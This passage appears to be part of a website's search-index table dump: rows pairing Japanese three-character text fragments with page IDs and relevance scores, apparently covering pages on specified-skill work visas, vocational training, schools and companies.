('姉妹を', 69, 'ja', 'node_search', 1),
('始いた', 27, 'ja', 'node_search', 0.316883),
('始しま', 23, 'ja', 'node_search', 1),
('始しま', 28, 'ja', 'node_search', 3),
('始まり', 140, 'ja', 'node_search', 1),
('始まり', 142, 'ja', 'node_search', 1),
('始まり', 175, 'ja', 'node_search', 0.953396),
('姿勢を', 80, 'ja', 'node_search', 1),
('姿勢を', 140, 'ja', 'node_search', 0.96498),
('娘が日', 80, 'ja', 'node_search', 4),
('娘とし', 80, 'ja', 'node_search', 1),
('娘を育', 87, 'ja', 'node_search', 0.584241),
('嬉しい', 179, 'ja', 'node_search', 1),
('嬉しく', 1, 'ja', 'node_search', 1),
('子です', 98, 'ja', 'node_search', 1),
('子ども', 126, 'ja', 'node_search', 1),
('子会社', 27, 'ja', 'node_search', 0.333027),
('子供た', 135, 'ja', 'node_search', 0.899454),
('子工学', 10, 'ja', 'node_search', 1),
('子移動', 162, 'ja', 'node_search', 0.757065),
('字を克', 62, 'ja', 'node_search', 0.805455),
('字日本', 62, 'ja', 'node_search', 0.591395),
('存続期', 27, 'ja', 'node_search', 0.459294),
('学の学', 10, 'ja', 'node_search', 1),
('学の学', 30, 'ja', 'node_search', 0.957226),
('学の磨', 62, 'ja', 'node_search', 4),
('学びた', 3, 'ja', 'node_search', 0.913226),
('学びた', 28, 'ja', 'node_search', 3),
('学ぶこ', 23, 'ja', 'node_search', 0.481063),
('学ぶこ', 122, 'ja', 'node_search', 1),
('学ぶこ', 155, 'ja', 'node_search', 0.961087),
('学や就', 181, 'ja', 'node_search', 0.942091),
('学や就', 182, 'ja', 'node_search', 0.976851),
('学や就', 183, 'ja', 'node_search', 0.976851),
('学を卒', 18, 'ja', 'node_search', 0.976851),
('学を卒', 62, 'ja', 'node_search', 1),
('学セン', 142, 'ja', 'node_search', 19),
('学位が', 30, 'ja', 'node_search', 0.949597),
('学位と', 10, 'ja', 'node_search', 1),
('学位保', 30, 'ja', 'node_search', 0.851346),
('学士号', 10, 'ja', 'node_search', 1),
('学士号', 30, 'ja', 'node_search', 1),
('学学校', 24, 'ja', 'node_search', 0.344608),
('学校で', 181, 'ja', 'node_search', 0.797402),
('学校で', 182, 'ja', 'node_search', 0.808176),
('学校で', 183, 'ja', 'node_search', 0.745294),
('学校と', 24, 'ja', 'node_search', 0.344129),
('学校の', 27, 'ja', 'node_search', 0.541108),
('学校は', 142, 'ja', 'node_search', 0.906287),
('学校は', 181, 'ja', 'node_search', 1),
('学校は', 182, 'ja', 'node_search', 1),
('学校は', 183, 'ja', 'node_search', 1),
('学校も', 24, 'ja', 'node_search', 0.942091),
('学校卒', 24, 'ja', 'node_search', 0.378421),
('学歴の', 5, 'ja', 'node_search', 0.781775),
('学生が', 136, 'ja', 'node_search', 0.961087),
('学生た', 95, 'ja', 'node_search', 1),
('学生だ', 136, 'ja', 'node_search', 1),
('学生に', 23, 'ja', 'node_search', 0.45501),
('学生に', 133, 'ja', 'node_search', 0.889397),
('学生に', 136, 'ja', 'node_search', 1),
('学生の', 133, 'ja', 'node_search', 0.766757),
('学生の', 136, 'ja', 'node_search', 0.689612),
('学生は', 136, 'ja', 'node_search', 1.53934),
('学生ビ', 62, 'ja', 'node_search', 0.712106),
('学生達', 24, 'ja', 'node_search', 2.00233),
('学習さ', 182, 'ja', 'node_search', 1),
('学習し', 181, 'ja', 'node_search', 0.78951),
('学習し', 182, 'ja', 'node_search', 0.800068),
('学習し', 183, 'ja', 'node_search', 0.738408),
('学習の', 27, 'ja', 'node_search', 0.769219),
('学習の', 62, 'ja', 'node_search', 1.69579),
('学習の', 179, 'ja', 'node_search', 1),
('学習の', 180, 'ja', 'node_search', 1),
('学習の', 182, 'ja', 'node_search', 4),
('学習の', 199, 'ja', 'node_search', 1),
('学習や', 173, 'ja', 'node_search', 1),
('学習や', 176, 'ja', 'node_search', 1),
('学習や', 184, 'ja', 'node_search', 1),
('学習や', 191, 'ja', 'node_search', 1),
('学習を', 135, 'ja', 'node_search', 0.913226),
('学習を', 142, 'ja', 'node_search', 0.938382),
('学習を', 181, 'ja', 'node_search', 1),
('学習ル', 142, 'ja', 'node_search', 0.687638),
('学習意', 195, 'ja', 'node_search', 1),
('学習成', 182, 'ja', 'node_search', 27),
('学習課', 181, 'ja', 'node_search', 1),
('学習課', 183, 'ja', 'node_search', 1),
('宅など', 27, 'ja', 'node_search', 0.406601),
('宅を建', 27, 'ja', 'node_search', 0.630018),
('宅を提', 27, 'ja', 'node_search', 0.482973),
('宅を訪', 162, 'ja', 'node_search', 0.949597),
('宅プロ', 27, 'ja', 'node_search', 1.43905),
('宅建築', 27, 'ja', 'node_search', 0.382539),
('守して', 77, 'ja', 'node_search', 4),
('守して', 87, 'ja', 'node_search', 1),
('守る責', 142, 'ja', 'node_search', 0.674137),
('安を軽', 138, 'ja', 'node_search', 0.845322),
('安全な', 73, 'ja', 'node_search', 1),
('安全な', 156, 'ja', 'node_search', 1),
('安全な', 157, 'ja', 'node_search', 1),
('安定し', 163, 'ja', 'node_search', 1),
('完全に', 87, 'ja', 'node_search', 0.749958),
('定した', 163, 'ja', 'node_search', 1),
('定する', 3, 'ja', 'node_search', 0.552215),
('定です', 142, 'ja', 'node_search', 0.909743),
('定です', 163, 'ja', 'node_search', 0.645209),
('定の分', 7, 'ja', 'node_search', 1.8861),
('定めた', 24, 'ja', 'node_search', 0.479169),
('定めた', 26, 'ja', 'node_search', 1),
('定ビザ', 24, 'ja', 'node_search', 0.390435),
('定介護', 141, 'ja', 'node_search', 1),
('定外職', 98, 'ja', 'node_search', 1),
('定外食', 70, 'ja', 'node_search', 1),
('定外食', 71, 'ja', 'node_search', 1),
('定外食', 72, 'ja', 'node_search', 1),
('定外食', 74, 'ja', 'node_search', 1),
('定外食', 75, 'ja', 'node_search', 1),
('定外食', 82, 'ja', 'node_search', 1),
('定外食', 84, 'ja', 'node_search', 1),
('定外食', 85, 'ja', 'node_search', 4),
('定外食', 90, 'ja', 'node_search', 1),
('定外食', 100, 'ja', 'node_search', 4),
('定外食', 104, 'ja', 'node_search', 7),
('定外食', 106, 'ja', 'node_search', 1),
('定外食', 110, 'ja', 'node_search', 1),
('定外食', 111, 'ja', 'node_search', 1),
('定外食', 118, 'ja', 'node_search', 1),
('定外食', 124, 'ja', 'node_search', 1),
('定外食', 138, 'ja', 'node_search', 1),
('定外食', 144, 'ja', 'node_search', 1),
('定技能', 24, 'ja', 'node_search', 0.830633),
('定技能', 62, 'ja', 'node_search', 0.718502),
('定技能', 154, 'ja', 'node_search', 28.7869),
('定技能', 155, 'ja', 'node_search', 35.5994),
('定技能', 156, 'ja', 'node_search', 28.9384),
('定技能', 157, 'ja', 'node_search', 28.8335),
('定技能', 160, 'ja', 'node_search', 30.9905),
('定技能', 161, 'ja', 'node_search', 28.75),
('定技能', 162, 'ja', 'node_search', 32.6896),
('定技能', 163, 'ja', 'node_search', 33),
('定技能', 164, 'ja', 'node_search', 28.7523),
('定技能', 165, 'ja', 'node_search', 30.9998),
('定技能', 166, 'ja', 'node_search', 31.0868),
('定技能', 167, 'ja', 'node_search', 28.8165),
('定技能', 168, 'ja', 'node_search', 28.7595),
('定技能', 169, 'ja', 'node_search', 31.1477),
('定技能', 170, 'ja', 'node_search', 30.9812),
('定技能', 171, 'ja', 'node_search', 31.0968),
('定技能', 173, 'ja', 'node_search', 31.0475),
('定技能', 174, 'ja', 'node_search', 28.7185),
('定技能', 175, 'ja', 'node_search', 28.7643),
('定技能', 176, 'ja', 'node_search', 28.7407),
('定技能', 177, 'ja', 'node_search', 28.71),
('定技能', 178, 'ja', 'node_search', 28.7818),
('定技能', 179, 'ja', 'node_search', 29.7316),
('定技能', 180, 'ja', 'node_search', 28.8001),
('定技能', 184, 'ja', 'node_search', 28.7571),
('定技能', 185, 'ja', 'node_search', 31.0092),
('定技能', 186, 'ja', 'node_search', 28.7692),
('定技能', 187, 'ja', 'node_search', 30.9628),
('定技能', 188, 'ja', 'node_search', 28.7619),
('定技能', 189, 'ja', 'node_search', 30.9998),
('定技能', 190, 'ja', 'node_search', 31.0769),
('定技能', 191, 'ja', 'node_search', 31.2327),
('定技能', 192, 'ja', 'node_search', 31.1169),
('定技能', 193, 'ja', 'node_search', 31.179),
('定技能', 194, 'ja', 'node_search', 31.0092),
('定技能', 195, 'ja', 'node_search', 28.8055),
('定技能', 196, 'ja', 'node_search', 31.1896),
('定技能', 197, 'ja', 'node_search', 31.0769),
('定技能', 198, 'ja', 'node_search', 28.7818),
('定技能', 199, 'ja', 'node_search', 31.0187),
('定技能', 200, 'ja', 'node_search', 31.1068),
('定月収', 162, 'ja', 'node_search', 0.722831),
('定期的', 142, 'ja', 'node_search', 1),
('定能力', 7, 'ja', 'node_search', 28.8861),
('定飲食', 101, 'ja', 'node_search', 4),
('定飲食', 102, 'ja', 'node_search', 1),
('実した', 164, 'ja', 'node_search', 0.886095),
('実した', 167, 'ja', 'node_search', 0.976851),
('実した', 168, 'ja', 'node_search', 0.836446),
('実した', 169, 'ja', 'node_search', 0.833529),
('実した', 170, 'ja', 'node_search', 0.819249),
('実した', 171, 'ja', 'node_search', 0.886095),
('実した', 174, 'ja', 'node_search', 0.863659),
('実した', 175, 'ja', 'node_search', 0.892724),
('実した', 176, 'ja', 'node_search', 0.845322),
('実した', 177, 'ja', 'node_search', 0.810915),
('実した', 184, 'ja', 'node_search', 0.822065),
('実した', 189, 'ja', 'node_search', 0.786915),
('実に必', 5, 'ja', 'node_search', 3),
('実り多', 165, 'ja', 'node_search', 0.848323),
('実り多', 166, 'ja', 'node_search', 0.836446),
('実り多', 178, 'ja', 'node_search', 0.892724),
('実り多', 185, 'ja', 'node_search', 0.786915),
('実り多', 187, 'ja', 'node_search', 0.813674),
('実を結', 171, 'ja', 'node_search', 0.942091),
('実を結', 175, 'ja', 'node_search', 1),
('実を結', 177, 'ja', 'node_search', 0.927431),
('実を結', 178, 'ja', 'node_search', 1),
('実を結', 184, 'ja', 'node_search', 0.938382),
('実を結', 185, 'ja', 'node_search', 1),
('実を結', 187, 'ja', 'node_search', 1),
('実を結', 191, 'ja', 'node_search', 1),
('実務研', 95, 'ja', 'node_search', 1),
('実務経', 198, 'ja', 'node_search', 0.980874),
('実技ク', 138, 'ja', 'node_search', 19),
('実施さ', 27, 'ja', 'node_search', 0.463662),
('実施し', 142, 'ja', 'node_search', 1),
('実現し', 199, 'ja', 'node_search', 0.938382),
('実現に', 193, 'ja', 'node_search', 1),
('実現に', 198, 'ja', 'node_search', 1),
('実用的', 135, 'ja', 'node_search', 1),
('実習が', 140, 'ja', 'node_search', 1),
('実習の', 135, 'ja', 'node_search', 19),
('実習を', 136, 'ja', 'node_search', 0.776703),
('実習ク', 133, 'ja', 'node_search', 20),
('実習授', 98, 'ja', 'node_search', 19),
('実習生', 24, 'ja', 'node_search', 1.4922),
('実習看', 136, 'ja', 'node_search', 19),
('実費負', 163, 'ja', 'node_search', 0.745294),
('実践的', 116, 'ja', 'node_search', 1),
('実践的', 135, 'ja', 'node_search', 0.882818),
('実践的', 136, 'ja', 'node_search', 0.860547),
('実践的', 138, 'ja', 'node_search', 0.961087),
('実践的', 142, 'ja', 'node_search', 0.736141),
('実際の', 155, 'ja', 'node_search', 1),
('客様に', 27, 'ja', 'node_search', 0.309018),
('室を開', 28, 'ja', 'node_search', 3),
('家に対', 7, 'ja', 'node_search', 1.8861),
('家庭用', 27, 'ja', 'node_search', 0.331691),
('家族の', 154, 'ja', 'node_search', 0.949597),
('家族の', 156, 'ja', 'node_search', 1),
('家族の', 157, 'ja', 'node_search', 0.989021),
('容が説', 6, 'ja', 'node_search', 3),
('宿泊分', 155, 'ja', 'node_search', 1.85135),
('宿泊分', 168, 'ja', 'node_search', 4),
('宿泊業', 164, 'ja', 'node_search', 1),
('宿泊業', 166, 'ja', 'node_search', 1),
('宿泊業', 168, 'ja', 'node_search', 1),
('宿題の', 142, 'ja', 'node_search', 1),
('富で能', 23, 'ja', 'node_search', 0.435532),
('富なイ', 135, 'ja', 'node_search', 1),
('富なイ', 136, 'ja', 'node_search', 1),
('富なエ', 10, 'ja', 'node_search', 3),
('富な先', 24, 'ja', 'node_search', 1),
('富な女', 18, 'ja', 'node_search', 1),
('富な技', 7, 'ja', 'node_search', 3.70218),
('富な指', 23, 'ja', 'node_search', 0.573154),
('富な溶', 8, 'ja', 'node_search', 2),
('富な講', 138, 'ja', 'node_search', 1),
('寝る習', 87, 'ja', 'node_search', 0.805455),
('察しま', 9, 'ja', 'node_search', 3),
('察しま', 17, 'ja', 'node_search', 4),
('寧にき', 87, 'ja', 'node_search', 0.961087),
('寧に指', 133, 'ja', 'node_search', 1),
('寮あり', 163, 'ja', 'node_search', 0.774192),
('寮の生', 5, 'ja', 'node_search', 0.934703),
('対して', 6, 'ja', 'node_search', 3),
('対して', 7, 'ja', 'node_search', 1.8861),
('対して', 23, 'ja', 'node_search', 1.04327),
('対する', 3, 'ja', 'node_search', 0.542319),
('対する', 7, 'ja', 'node_search', 32.6432),
('対する', 122, 'ja', 'node_search', 0.931053),
('対策だ', 155, 'ja', 'node_search', 1),
('対策や', 155, 'ja', 'node_search', 1),
('対策ク', 155, 'ja', 'node_search', 33),
('対象と', 140, 'ja', 'node_search', 20),
('対象と', 162, 'ja', 'node_search', 1),
('対象と', 163, 'ja', 'node_search', 1),
('対象に', 155, 'ja', 'node_search', 1),
('対象に', 163, 'ja', 'node_search', 1),
('寿司レ', 122, 'ja', 'node_search', 19),
('寿司料', 122, 'ja', 'node_search', 0.989021),
('専門コ', 27, 'ja', 'node_search', 0.620288),
('専門人', 170, 'ja', 'node_search', 0.845322),
('専門作', 27, 'ja', 'node_search', 0.609315),
('専門学', 30, 'ja', 'node_search', 0.857458),
('専門家', 7, 'ja', 'node_search', 3.77219),
('専門知', 27, 'ja', 'node_search', 0.436309),
('専門知', 62, 'ja', 'node_search', 1),
('専門職', 7, 'ja', 'node_search', 1.8861),
('将来に', 195, 'ja', 'node_search', 1),
('将来の', 182, 'ja', 'node_search', 0.993146),
('将来の', 183, 'ja', 'node_search', 0.953396),
('将来の', 196, 'ja', 'node_search', 1),
('将来へ', 197, 'ja', 'node_search', 1),
('尊厳を', 87, 'ja', 'node_search', 0.604732),
('尊敬し', 87, 'ja', 'node_search', 1),
('尊重を', 25, 'ja', 'node_search', 1),
('導しま', 133, 'ja', 'node_search', 1),
('導する', 133, 'ja', 'node_search', 1),
('導によ', 136, 'ja', 'node_search', 1.71882),
('導の下', 116, 'ja', 'node_search', 1),
('導の源', 120, 'ja', 'node_search', 1),
('導を受', 138, 'ja', 'node_search', 1),
('導を通', 142, 'ja', 'node_search', 0.725015),
('導入で', 142, 'ja', 'node_search', 1),
('導者た', 23, 'ja', 'node_search', 0.569105),
('小グル', 138, 'ja', 'node_search', 1),
('少し話', 5, 'ja', 'node_search', 0.76188),
('少なく', 3, 'ja', 'node_search', 1),
('少なく', 18, 'ja', 'node_search', 1),
('少人数', 138, 'ja', 'node_search', 0.766757),
('少年資', 27, 'ja', 'node_search', 0.797402),
('尚良い', 30, 'ja', 'node_search', 0.927431),
('就いて', 68, 'ja', 'node_search', 1),
('就くた', 98, 'ja', 'node_search', 1),
('就労に', 186, 'ja', 'node_search', 0.889397),
('就労を', 154, 'ja', 'node_search', 0.810915),
('就労を', 164, 'ja', 'node_search', 0.774192),
('就労を', 165, 'ja', 'node_search', 0.771698),
('就労を', 167, 'ja', 'node_search', 0.842342),
('就職な', 183, 'ja', 'node_search', 0.968904),
('就職に', 182, 'ja', 'node_search', 0.968904),
('就職の', 133, 'ja', 'node_search', 0.716357),
('就職へ', 181, 'ja', 'node_search', 0.934703),
('就職も', 23, 'ja', 'node_search', 0.522445),
('就職を', 155, 'ja', 'node_search', 1),
('就職を', 173, 'ja', 'node_search', 0.784336),
('就職を', 174, 'ja', 'node_search', 0.742984),
('就職を', 175, 'ja', 'node_search', 0.792123),
('就職を', 176, 'ja', 'node_search', 0.76188),
('就職支', 161, 'ja', 'node_search', 0.833529),
('就職活', 179, 'ja', 'node_search', 0.873132),
('就職面', 132, 'ja', 'node_search', 1),
('尽くす', 87, 'ja', 'node_search', 0.697623),
('尽力し', 23, 'ja', 'node_search', 0.414858),
('尽力し', 136, 'ja', 'node_search', 0.650439),
('居住す', 150, 'ja', 'node_search', 1),
('屋エリ', 162, 'ja', 'node_search', 0.802752),
('岡への', 80, 'ja', 'node_search', 1),
('岸で経', 23, 'ja', 'node_search', 0.580033),
('岸で経', 24, 'ja', 'node_search', 1),
('崎への', 76, 'ja', 'node_search', 4),
('工事の', 27, 'ja', 'node_search', 0.833529),
('工事を', 27, 'ja', 'node_search', 0.553478),
('工事監', 27, 'ja', 'node_search', 0.600219),
('工学の', 30, 'ja', 'node_search', 0.961087),
('工工事', 27, 'ja', 'node_search', 0.836446),
('工業用', 27, 'ja', 'node_search', 0.409315),
('工業関', 24, 'ja', 'node_search', 0.610858),
('工科大', 27, 'ja', 'node_search', 0.354488),
('差し引', 8, 'ja', 'node_search', 4),
('己管理', 5, 'ja', 'node_search', 0.989021),
('巻く日', 122, 'ja', 'node_search', 1),
('市での', 163, 'ja', 'node_search', 1),
('市で日', 24, 'ja', 'node_search', 0.357567),
('市にあ', 134, 'ja', 'node_search', 1),
('市にあ', 144, 'ja', 'node_search', 1),
('希望す', 162, 'ja', 'node_search', 0.685676),
('師から', 138, 'ja', 'node_search', 1),
('師が指', 133, 'ja', 'node_search', 1),
('師によ', 142, 'ja', 'node_search', 0.745294),
('師の指', 136, 'ja', 'node_search', 0.736141),
('師の方', 133, 'ja', 'node_search', 0.845322),
('席は非', 140, 'ja', 'node_search', 0.845322),
('常にサ', 80, 'ja', 'node_search', 1),
('常に選', 25, 'ja', 'node_search', 1),
('常に重', 140, 'ja', 'node_search', 0.836446),
('常の給', 5, 'ja', 'node_search', 1),
('常会話', 163, 'ja', 'node_search', 0.733888),
('常生活', 162, 'ja', 'node_search', 0.934703),
('幅広い', 133, 'ja', 'node_search', 1),
('年には', 140, 'ja', 'node_search', 1),
('年に会', 27, 'ja', 'node_search', 1),
('年に外', 27, 'ja', 'node_search', 0.348983),
('年に当', 23, 'ja', 'node_search', 1),
('年に設', 23, 'ja', 'node_search', 1),
('年に設', 27, 'ja', 'node_search', 1.72329),
('年の勤', 18, 'ja', 'node_search', 1),
('年の竣', 27, 'ja', 'node_search', 0.845322),
('年の経', 10, 'ja', 'node_search', 2),
('年の間', 3, 'ja', 'node_search', 1),
('年以上', 7, 'ja', 'node_search', 1.82448),
('年以上', 133, 'ja', 'node_search', 1),
('年資源', 27, 'ja', 'node_search', 0.794753),
('年間の', 62, 'ja', 'node_search', 1),
('年間続', 23, 'ja', 'node_search', 0.827757),
('年齢が', 5, 'ja', 'node_search', 0.824901),
('幼い娘', 80, 'ja', 'node_search', 4),
('広いト', 133, 'ja', 'node_search', 1),
('広がる', 183, 'ja', 'node_search', 27),
('広げる', 183, 'ja', 'node_search', 0.916736),
('広げる', 196, 'ja', 'node_search', 0.976851),
('底的に', 87, 'ja', 'node_search', 0.71),
('店で組', 27, 'ja', 'node_search', 1),
('店と提', 142, 'ja', 'node_search', 0.879565),
('店の面', 101, 'ja', 'node_search', 4),
('店の面', 102, 'ja', 'node_search', 1),
('府およ', 27, 'ja', 'node_search', 0.47729),
('府から', 23, 'ja', 'node_search', 0.695602),
('府機関', 27, 'ja', 'node_search', 0.681785),
('府部門', 27, 'ja', 'node_search', 0.385536),
('度計算', 27, 'ja', 'node_search', 0.533952),
('庭用自', 27, 'ja', 'node_search', 0.331248),
('康でア', 5, 'ja', 'node_search', 0.808176),
('康でコ', 18, 'ja', 'node_search', 1),
('康で体', 163, 'ja', 'node_search', 0.703756),
('康と仕', 80, 'ja', 'node_search', 1),
('康に気', 77, 'ja', 'node_search', 4),
('康をお', 113, 'ja', 'node_search', 1),
('康を祈', 111, 'ja', 'node_search', 1),
('康保険', 8, 'ja', 'node_search', 2),
('建ての', 27, 'ja', 'node_search', 1.46606),
('建てタ', 163, 'ja', 'node_search', 0.76188),
('建物の', 27, 'ja', 'node_search', 0.66666),
('建築株', 23, 'ja', 'node_search', 2.17203),
('建築業', 24, 'ja', 'node_search', 0.60778),
('建築設', 27, 'ja', 'node_search', 0.62674),
('建設し', 27, 'ja', 'node_search', 0.404588),
('建設プ', 27, 'ja', 'node_search', 0.45164),
('建設会', 27, 'ja', 'node_search', 0.72066),
('建設前', 27, 'ja', 'node_search', 0.400625),
('建設工', 27, 'ja', 'node_search', 0.556022),
('建設業', 27, 'ja', 'node_search', 0.879565),
('建設機', 27, 'ja', 'node_search', 0.896076),
('建設現', 5, 'ja', 'node_search', 3),
('建設現', 23, 'ja', 'node_search', 0.957226),
('建設部', 27, 'ja', 'node_search', 0.394193),
('弊社ウ', 1, 'ja', 'node_search', 46),
('式会社', 9, 'ja', 'node_search', 28),
('式会社', 11, 'ja', 'node_search', 1),
('式会社', 17, 'ja', 'node_search', 30),
('式会社', 19, 'ja', 'node_search', 1),
('式会社', 23, 'ja', 'node_search', 3.1674),
('式会社', 27, 'ja', 'node_search', 19.9774),
('式会社', 62, 'ja', 'node_search', 0.781775),
('引いた', 8, 'ja', 'node_search', 2),
('引かれ', 8, 'ja', 'node_search', 2),
('引き続', 3, 'ja', 'node_search', 0.66666),
('引き続', 186, 'ja', 'node_search', 0.873132),
('張する', 62, 'ja', 'node_search', 0.819249),
('張って', 69, 'ja', 'node_search', 1),
('強い努', 192, 'ja', 'node_search', 1),
('強い意', 186, 'ja', 'node_search', 1),
('強い意', 189, 'ja', 'node_search', 1),
('強い意', 192, 'ja', 'node_search', 1),
('強い挑', 196, 'ja', 'node_search', 1),
('強する', 98, 'ja', 'node_search', 1),
('強でき', 24, 'ja', 'node_search', 0.957226),
('強化す', 142, 'ja', 'node_search', 0.927431),
('強度計', 27, 'ja', 'node_search', 0.535131),
('当たり', 135, 'ja', 'node_search', 0.816452),
('当は通', 5, 'ja', 'node_search', 1),
('当ウェ', 1, 'ja', 'node_search', 1),
('当校で', 181, 'ja', 'node_search', 1),
('当校で', 182, 'ja', 'node_search', 1),
('当機関', 156, 'ja', 'node_search', 1.9534),
('当機関', 157, 'ja', 'node_search', 1.84234),
('当社の', 1, 'ja', 'node_search', 7),
('当社の', 27, 'ja', 'node_search', 2.6925),
('当社の', 142, 'ja', 'node_search', 1.64839),
('当社は', 23, 'ja', 'node_search', 2),
('当社は', 27, 'ja', 'node_search', 2.10249),
('当社は', 142, 'ja', 'node_search', 0.664818),
('当社ニ', 23, 'ja', 'node_search', 1),
('彙を拡', 62, 'ja', 'node_search', 0.827757),
('彙を知', 3, 'ja', 'node_search', 0.797402),
('形成に', 185, 'ja', 'node_search', 1),
('形成を', 162, 'ja', 'node_search', 1.68961),
('役割を', 80, 'ja', 'node_search', 1),
('彼らの', 120, 'ja', 'node_search', 1),
('彼らは', 150, 'ja', 'node_search', 1),
('彼女た', 80, 'ja', 'node_search', 1),
('彼女た', 157, 'ja', 'node_search', 1),
('彼女の', 156, 'ja', 'node_search', 1),
('待され', 126, 'ja', 'node_search', 1),
('待され', 180, 'ja', 'node_search', 0.899454),
('待され', 185, 'ja', 'node_search', 0.854391),
('待され', 186, 'ja', 'node_search', 0.931053),
('待され', 187, 'ja', 'node_search', 0.889397),
('待され', 193, 'ja', 'node_search', 0.889397),
('待され', 195, 'ja', 'node_search', 0.949597),
('待され', 198, 'ja', 'node_search', 0.902857),
('待され', 199, 'ja', 'node_search', 0.869951),
('待して', 140, 'ja', 'node_search', 0.781775),
('待して', 182, 'ja', 'node_search', 0.848323),
('待して', 183, 'ja', 'node_search', 0.779231),
('待して', 188, 'ja', 'node_search', 0.857458),
('待して', 197, 'ja', 'node_search', 0.810915),
('待つも', 62, 'ja', 'node_search', 0.902857),
('律の重', 122, 'ja', 'node_search', 1),
('後さら', 192, 'ja', 'node_search', 0.927431),
('後にあ', 122, 'ja', 'node_search', 0.96498),
('後のご', 169, 'ja', 'node_search', 0.854391),
('後のご', 171, 'ja', 'node_search', 0.833529),
('後のご', 176, 'ja', 'node_search', 0.866793),
('後のさ', 161, 'ja', 'node_search', 0.784336),
('後のさ', 181, 'ja', 'node_search', 0.848323),
('後のさ', 199, 'ja', 'node_search', 0.913226),
('後の成', 198, 'ja', 'node_search', 0.923838),
('後の手', 160, 'ja', 'node_search', 0.886095),
('後の手', 161, 'ja', 'node_search', 0.938382),
('後の手', 166, 'ja', 'node_search', 0.923838),
('後の手', 168, 'ja', 'node_search', 0.927431),
('後の手', 170, 'ja', 'node_search', 0.938382),
('後の手', 178, 'ja', 'node_search', 0.957226),
('後の手', 179, 'ja', 'node_search', 0.774192),
('後の手', 186, 'ja', 'node_search', 0.920273),
('後の手', 187, 'ja', 'node_search', 0.869951),
('後の手', 190, 'ja', 'node_search', 0.913226),
('後の手', 191, 'ja', 'node_search', 0.854391),
('後の手', 193, 'ja', 'node_search', 0.836446),
('後の手', 194, 'ja', 'node_search', 0.889397),
('後の手', 195, 'ja', 'node_search', 0.866793),
('後の手', 198, 'ja', 'node_search', 0.822065),
('後の活', 180, 'ja', 'node_search', 0.931053),
('後の活', 185, 'ja', 'node_search', 0.873132),
('後の活', 186, 'ja', 'node_search', 0.96498),
('後まで', 179, 'ja', 'node_search', 0.848323),
('後もさ', 182, 'ja', 'node_search', 0.902857),
('後もさ', 183, 'ja', 'node_search', 0.873132),
('後もミ', 154, 'ja', 'node_search', 0.845322),
('後もミ', 165, 'ja', 'node_search', 0.802752),
('後もミ', 167, 'ja', 'node_search', 0.879565),
('後もミ', 174, 'ja', 'node_search', 0.771698),
('後もミ', 179, 'ja', 'node_search', 0.957226),
('後も果', 80, 'ja', 'node_search', 1),
('徒が独', 142, 'ja', 'node_search', 0.836446),
('徒にサ', 135, 'ja', 'node_search', 0.725015),
('徒の勤', 135, 'ja', 'node_search', 0.848323),
('徒の皆', 140, 'ja', 'node_search', 1),
('徒の興', 142, 'ja', 'node_search', 1),
('徒は毎', 142, 'ja', 'node_search', 0.695602),
('徒を対', 140, 'ja', 'node_search', 20),
('徒達の', 26, 'ja', 'node_search', 1),
('徒達を', 25, 'ja', 'node_search', 1),
('徒達を', 26, 'ja', 'node_search', 1),
('従事し', 27, 'ja', 'node_search', 0.376109),
('従事す', 7, 'ja', 'node_search', 1.8861),
('従業員', 23, 'ja', 'node_search', 0.78951),
('従業員', 27, 'ja', 'node_search', 0.960997),
('従業員', 77, 'ja', 'node_search', 1),
('得おめ', 83, 'ja', 'node_search', 1),
('得おめ', 86, 'ja', 'node_search', 1),
('得おめ', 88, 'ja', 'node_search', 1),
('得おめ', 89, 'ja', 'node_search', 1),
('得おめ', 91, 'ja', 'node_search', 1),
('得おめ', 92, 'ja', 'node_search', 1),
('得おめ', 93, 'en', 'node_search', 2),
('得おめ', 93, 'ja', 'node_search', 1),
('得おめ', 96, 'ja', 'node_search', 1),
('得おめ', 97, 'ja', 'node_search', 1),
('得おめ', 99, 'ja', 'node_search', 1),
('得おめ', 103, 'ja', 'node_search', 1),
('得おめ', 105, 'ja', 'node_search', 1),
('得おめ', 108, 'ja', 'node_search', 1),
('得おめ', 145, 'ja', 'node_search', 20),
('得おめ', 148, 'ja', 'node_search', 1),
('得おめ', 151, 'ja', 'node_search', 20),
('得おめ', 152, 'en', 'node_search', 20),
('得おめ', 152, 'ja', 'node_search', 20),
('得おめ', 153, 'ja', 'node_search', 20),
('得して', 111, 'ja', 'node_search', 1),
('得して', 147, 'ja', 'node_search', 7),
('得する', 23, 'ja', 'node_search', 0.443437),
('得られ', 29, 'ja', 'node_search', 3),
('得られ', 194, 'ja', 'node_search', 0.816452),
('得税な', 8, 'ja', 'node_search', 2),
('徳心を', 87, 'ja', 'node_search', 1),
('徹底的', 87, 'ja', 'node_search', 0.712106),
('心から', 133, 'ja', 'node_search', 0.808176),
('心な準', 160, 'ja', 'node_search', 1),
('心な準', 161, 'ja', 'node_search', 1),
('心な準', 168, 'ja', 'node_search', 1),
('心な準', 170, 'ja', 'node_search', 1),
('心な講', 133, 'ja', 'node_search', 0.854391),
('心に取', 150, 'ja', 'node_search', 1),
('心より', 154, 'ja', 'node_search', 1),
('心より', 156, 'ja', 'node_search', 0.993146),
('心より', 157, 'ja', 'node_search', 0.873132),
('心より', 160, 'ja', 'node_search', 0.934703),
('心より', 161, 'ja', 'node_search', 0.993146),
('心より', 164, 'ja', 'node_search', 0.96498),
('心より', 165, 'ja', 'node_search', 0.906287),
('心より', 166, 'ja', 'node_search', 0.976851),
('心より', 167, 'ja', 'node_search', 0.909743),
('心より', 168, 'ja', 'node_search', 0.980874),
('心より', 169, 'ja', 'node_search', 0.882818),
('心より', 170, 'ja', 'node_search', 0.993146),
('心より', 171, 'ja', 'node_search', 0.860547),
('心より', 173, 'ja', 'node_search', 0.848323),
('心より', 174, 'ja', 'node_search', 0.792123),
('心より', 175, 'ja', 'node_search', 0.854391),
('心より', 176, 'ja', 'node_search', 0.906287),
('心より', 177, 'ja', 'node_search', 0.784336),
('心より', 178, 'ja', 'node_search', 0.857458),
('心より', 179, 'ja', 'node_search', 0.802752),
('心より', 180, 'ja', 'node_search', 0.889397),
('心より', 181, 'ja', 'node_search', 0.892724),
('心より', 182, 'ja', 'node_search', 0.860547),
('心より', 183, 'ja', 'node_search', 0.78951),
('心より', 184, 'ja', 'node_search', 0.781775),
('心より', 185, 'ja', 'node_search', 0.845322),
('心より', 186, 'ja', 'node_search', 0.833529),
('心より', 187, 'ja', 'node_search', 0.784336),
('心より', 188, 'ja', 'node_search', 0.842342),
('心より', 189, 'ja', 'node_search', 0.860547),
('心より', 190, 'ja', 'node_search', 0.819249),
('心より', 191, 'ja', 'node_search', 0.899454),
